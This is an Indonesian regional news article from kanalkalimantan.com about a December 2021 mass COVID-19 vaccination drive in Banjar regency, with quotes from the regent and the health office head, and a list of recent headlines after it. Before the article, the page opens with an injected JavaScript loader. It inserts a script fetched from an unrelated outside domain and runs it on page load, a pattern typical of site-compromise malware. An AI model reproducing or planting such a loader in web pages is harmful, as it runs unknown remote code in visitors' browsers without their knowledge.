(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Kejar Target, Pemkab Banjar Bersama Forkopimda Gelar Vaksinasi Massal


KANALKALIMANTAN.COM, MARTAPURA
Halaman kantor Bupati Banjar di Jalan A Yani Km 40, Martapura, Sabtu (11/12/2021) siang dipadati warga yang mengikuti kegiatan vaksinasi massal.

Vaksinasi massal ini dilaksanakan dibeberapa tempat, di antaranya di Mapolres Banjar, Kodim 1006 Banjar dan seluruh kecamatan yang ada di Kabupaten Banjar.

Bupati Banjar H Saidi Mansyur bersama Wabup Banjar Habib Idrus Al-Habsyie turut hadir memantau kegiatan, melakukan pengundian dan menyerahkan doorprize kepada peserta vaksinasi yang beruntung.

Kapolres Banjar Doni Hadi Santoso dan Dandim 1006 Banjar Imam Muchtarom juga berhadir pada kegiatan itu.

Saidi Mansyur saat meninjau kegiatan itu mengatakan, saat ini Kabupaten Banjar mencapai 35 persen vaksinasi, dihitung jumlah penduduknya termasuk dua besar terbanyak di Kalimantan Selatan setelah Kota Banjarmasin.

 

Penyerahan doorprize kepada peserta yang beruntung. Foto : DKISP Kabupaten Banjar

Baca juga : Porseni PGRI Banjarbaru 2021 Digelar, Pertandingkan Enam Lomba

“Secara umum Kalimantan Selatan masih dibawah angka yang ditargetkan Pemerintah Pusat, namun diakhir Desember ini target vaksin kita kejar bersama Forkopimda,”  ucap Saidi.

Lebih jauh dia menambahkan, target vaksinasi satu harinya harus mencapai 5.000 vaksin dari angka satu persen.

“Mudah mudahan target ini bisa tercapai, dan herd immunity bisa terlaksana di Kabupaten Banjar sehingga masyarakat juga sehat,” harap dia.

Sementara itu Kepala Dinas Kesehatan Kabupaten Banjar, Diauddin, mengungkapkan, jenis vaksin yang tersedia pada vaksin massal ini berupa Astrazeneca, Sinovac dan Pfizer.

“Kalau Moderna juga disiapkan untuk dosis dua tapi harus 10 orang baru vaksin dibuka, karena sedikitnya stok vaksin,” jelas dia.

Di akhir kegiatan Bupati Banjar mengundi para peserta yang mengikuti vaksin secara acak dengan doorprize di antaranya TV LED, kulkas dan mesin cuci. (kanalkalimantan.com/rls)

Reporter : Rls
Editor : Dhani


Desy Arfianty

Recent Posts

Begini Penjelasan Disporabudpar Banjarbaru Soal Perizinan Hotel Aeris

KANALKALIMANTAN.COM, BANJARBARU – Sebuah hotel baru di ruas Jalan Panglima Batur Banjarbaru akan melakukan soft… Read More

4 jam ago

Gerilya Politik Lisa Halaby ke Nasdem Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Langkah politik Erna Lisa Halaby mencari partai politik pengusung dalam Pemilihan Wali… Read More

4 jam ago

Tim Wasev Cek Langsung Lokasi TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana bersama Tim Pengawas… Read More

5 jam ago

Lutung Tersengat Listrik Dievakuasi Warga, Damkar HSU Amankan Satwa Dilindungi

KANALKALIMANTAN.COM, AMUNTAI - Tersengat aliran listrik bertegangan tinggi, seekor satwa dilindungi lutung terkapar berhasil dievakuasi… Read More

6 jam ago

“Pesta Siswa Literasi Digital” di Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - Teknologi yang saat ini berkembang sangat pesat dan cepat telah membuat perubahan… Read More

6 jam ago

Kontestasi Pilwali Banjarbaru, Golkar Partai Pertama Incaran Lisa Halaby

Lisa Halaby: Saya Siap, Insyaallah Mundur Sebagai ASN Read More

7 jam ago

This website uses cookies.